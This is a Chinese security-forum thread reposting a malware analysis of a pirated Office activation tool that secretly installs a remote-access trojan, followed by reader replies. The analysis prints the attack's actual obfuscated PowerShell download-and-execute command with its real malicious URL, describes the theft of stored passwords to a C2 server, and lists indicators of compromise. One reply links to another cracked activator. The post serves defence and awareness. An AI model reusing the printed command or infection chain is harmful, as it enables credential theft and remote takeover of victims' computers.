官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn»网站 【 病毒分析 】 『病毒分析区』 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】
12345678910... 46下一页
返回列表 发新帖
查看: 60084|回复: 460
上一主题 下一主题
收起左侧

[转载] 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】

    [复制链接]
没有星星的夜空
跳转到指定楼层
楼主
没有星星的夜空 发表于 2019-4-9 08:37 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 没有星星的夜空 于 2019-5-5 16:05 编辑

概述
某讯御见威胁情报中心检测到一款Office激活工具被捆绑传播远程控制木马,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马运行,木马会搜集敏感信息上传并对电脑进行远程控制。


黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

资源文件
资源文件中包含的lnk文件信息


激活工具运行时从资源文件中释放lnk文件:


Lnk文件执行恶意Powershell脚本代码:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');t $nXR

Lnk指向的代码下载执行Powershell脚本:
hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)


Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start
启动程序


远程控制木马
下载的C:\Users\Public\xxxx.exe为远程控制木马,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。


发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php


安全建议
1、使用正版软件,尽量不要使用激活、破解工具。
2、不要运行来历不明的程序。
3、使用电XX家拦截该类木马攻击。

IOCs

MD5
2fc6dd175a2288a9c2bed36969e3241d
0c638e0c02e0d1c2a2eb7429a51e13b0
a5898f7aae5d6212fac6447bf801ecc1
eb5b534366f0831b3842abac17346cd5
171a6a149d36d8be2f9d4b35c25a8ec4
03a1845d78da4d5d40ffa6cb3892ce0c
ca21c7ae0664b9b5dc24710b0221d4f4
006f03b07fe27eaf4ab4a866a02dc5dd
d343f4179b00f1f3b2ab7b942648b0c2
10e7859d0dfabae2eebc9605e40612f2
05861babd099e81990cfda340de5de01
4e5b4bc27cad9891c1d11ff6ee1b3581
82b313ceef47bf9aa18e3e0946fca773

IP
92.53.120.114
31.177.78.16

Domain
boundertime.ru
timebound.ug
ghjgfjhjgf.ru

URL
hxxp://timebound.ug/pps.ps1
hxxp://boundertime.ru/pps.ps1
hxxp://ghjgfjhjgf.ru/index.php

动动小手,免费评分走一波

我自己用的这个还可以吧
论坛内也有好多的
链接:https://pan.baidu.com/s/1uncSk4EsUzbputHIIZ5b-w 密码:2mz0
没看版本是啥


论坛里有最新发布的,应该比我的新一点
https://www.52pojie.cn/thread-915743-1-1.html

@迷失自我 我不会点评呀,而且每小时只能发10条,只能在这里说明一下了

点评

迷失自我
有不带木马的激活工具的老铁分享一下,点评取等候。。。  发表于 2019-4-9 08:57

免费评分

参与人数 217吾爱币 +186 热心值 +194 收起 理由
liubinzb123 + 1 热心回复!
13697i + 1 热心回复!
kang1314 + 1 + 1 谢谢@Thanks!
清炒藕片丶 + 1 + 1 之前还真下载过英文版的,使用管家就能搞定吗?
Mr.L529042671 + 1 + 1 用心讨论,共获提升!
vb9803 + 1 + 1 我很赞同!
Black-Beauty + 1 + 1 用心讨论,共获提升!
随feng飞扬 + 1 + 1 热心回复!
testonly0531 + 1 谢谢@Thanks!
lhl421 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
fbgnhm110 + 1 + 1 谢谢@Thanks!
AlexAn + 1 我很赞同!
darkbluecs + 1 + 1 谢谢@Thanks!
niugle + 1 我很赞同!
jamiedame + 1 我很赞同!
Mr.Mlwareson_V + 1 + 1 鼓励转贴优秀软件安全工具和文档!
jiang3986633 + 1 + 1 谢谢@Thanks!
ameise + 1 + 1 我很赞同!
灬酱油党 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
泠月酱 + 1 + 1 谢谢@Thanks!
ymd + 1 谢谢@Thanks!
XenProject + 1 + 1 用心讨论,共获提升!
zgcwkj + 1 + 1 鼓励转贴优秀软件安全工具和文档!
52user + 1 + 1 用心讨论,共获提升!
joyu610 + 1 我很赞同!
嗜血天下0 + 1 + 1 我很赞同!
uai1314 + 1 + 1 谢谢@Thanks!
lxq951 + 1 + 1 用心讨论,共获提升!
维系小冉 + 1 学习了,感谢楼主
路人林 + 1 我很赞同!
QDS123 + 1 + 1 希望这个真的是有用的,以前都不管这些,被你这么一说还真的是一抖一抖的,.
河东奇 + 1 + 1 我很赞同!
风扬起时 + 1 + 1 热心回复!
deva- + 1 + 1 谢谢@Thanks!
庄周梦蝶 + 1 + 1 热心回复!
abc302001 + 1 + 1 谢谢@Thanks!
fengbolee + 1 + 1 谢谢@Thanks!
mozart8341 + 1 + 1 我很赞同!
Zome + 1 谢谢@Thanks!
Dishang + 1 + 1 热心回复!
张啊啊 + 1 + 1 谢谢@Thanks!
shyocean + 1 用心讨论,共获提升!
Zxx_ + 1 + 1 热心回复!
hzyh + 1 + 1 我很赞同!
uriel.you + 1 + 1 我很赞同!
南飞-鹿~ + 1 谢谢@Thanks!
十三叔 + 1 + 1 我很赞同!
小心110 + 1 谢谢@Thanks!
清火胶囊 + 1 + 1 用心讨论,共获提升!
浅笑如昔丶 + 1 之前就是论坛里下载了一个,支付宝被远程了2万多。还好有保险赔
游隼89 + 1 + 1 我看不出来。仰望能看出来的/
sylw6919 + 1 + 1 我很赞同!
苏落大神 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
三行而后思 + 1 + 1 我很赞同!
uiui + 1 + 1 谢谢@Thanks!
欧皇非皇 + 1 + 1 我很赞同!
h45673 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
rainxusky + 1 + 1 我很赞同!
zfzzqlx + 1 + 1 热心回复!
sr_bz + 1 + 1 谢谢@Thanks!
jugexigua + 1 谢谢@Thanks!
MichaelWin + 1 热心回复!
顾忌你11 + 1 + 1 谢谢@Thanks!
Yancy-Lan + 1 谢谢@Thanks!
jljyyjd + 1 我很赞同!
exe19890522 + 1 谢谢@Thanks!
月如梭红尘辗 + 1 谢谢@Thanks!
woditian + 1 + 1 谢谢@Thanks!
minglei526 + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
一变万变 + 1 + 1 楼主发这个帖子有什么用?告诉你有病,不给药,还不说怎么看病
dzpos + 1 + 1 热心回复!
路人点心 + 1 + 1 我很赞同!
皓哥阿 + 1 + 1 谢谢@Thanks!
踽踽独行 + 1 + 1 吓得我赶紧查杀电脑
放嗳自由 + 1 + 1 谢谢@Thanks!
夏520 + 1 + 1 以前没注意过,下次谨慎,打击盗版,坚决不买正版
a764329871 + 1 + 1 我很赞同!
ff0510 + 1 + 1 谢谢@Thanks!
rnwxa + 1 + 1 热心回复!
q245198004 + 1 + 1 谢谢@Thanks!
nakasou + 1 + 1 我很赞同!
zhjgood + 1 + 1 谢谢@Thanks!
pushaojie + 1 + 1 热心回复!
pjavac + 1 + 1 我很赞同!
shanfei + 1 + 1 谢谢@Thanks!
zourongfeng + 1 + 1 谢谢@Thanks!
sfoto2011 + 1 + 1 谢谢@Thanks!
zpp7 + 1 + 1 我很赞同!
lxb + 1 + 1 我很赞同!
973143152 + 1 + 1 热心回复!
游侠dede + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
遇日不归 + 1 + 1 我很赞同!
1000Y + 1 + 1 谢谢@Thanks!
寂寞00侃 + 1 鼓励转贴优秀软件安全工具和文档!
cuteftp + 1 + 1 鼓励转贴优秀软件安全工具和文档!
wjzj + 1 + 1 谢谢@Thanks!
練ppg + 1 + 1 热心回复!
Raylist + 1 热心回复!
树泽 + 1 谢谢@Thanks!
xiaokaic + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

爱凤凤呦
头像被屏蔽
推荐
爱凤凤呦 发表于 2019-4-9 08:41
提示: 作者被禁止或删除 内容自动屏蔽
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持 8

举报

没有星星的夜空
推荐
 楼主| 没有星星的夜空 发表于 2019-4-9 08:44 |楼主
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

嗯,帖子说明了是盗版激活工具

正版激活工具一般都没有的
如何升级?如何获得积分?积分对应解释说明!
回复 支持 2

举报

hhk007
推荐
hhk007 发表于 2019-4-9 08:41
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
如何发现呢?
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持 2

举报

没有星星的夜空
推荐
 楼主| 没有星星的夜空 发表于 2019-4-9 08:48 |楼主
hhk007 发表于 2019-4-9 08:41
如何发现呢?

说不定就是因为某讯工程师用了激活工具竟然被黑,以至于开始搜寻这事了
如何快速判断一个文件是否为病毒!
回复 支持 2

举报

a2f88
推荐
a2f88 发表于 2019-4-9 08:41
不使用破解工具的概率不大啊
回复 支持 1

举报

没有星星的夜空
推荐
 楼主| 没有星星的夜空 发表于 2019-4-9 09:50 |楼主
简单i 发表于 2019-4-9 09:48
用什么软件可以查毒呢

某讯安全管家、36o 都可以的

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
简单i + 1 + 1 谢谢 谢谢

查看全部评分

回复 支持 1

举报

爱到发烧
6#
爱到发烧 发表于 2019-4-9 08:39
很好的帖子,学习了
回复 支持

举报

努力的笨蛋
7#
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

点评

zaq4736
就是防不胜防啊。有靠谱的来源吗?分享一下呗。  发表于 2019-4-11 18:41
回复 支持

举报

baiqpl0254
头像被屏蔽
8#
baiqpl0254 发表于 2019-4-9 08:43
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持

举报

201411112020
9#
201411112020 发表于 2019-4-9 08:44
谢谢分享!
回复 支持

举报

bricher9988
10#
bricher9988 发表于 2019-4-9 08:44
楼主辛苦了,谢谢分享!!!
回复 支持

举报

下一页 »
12345678910... 46下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-5-6 16:13

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表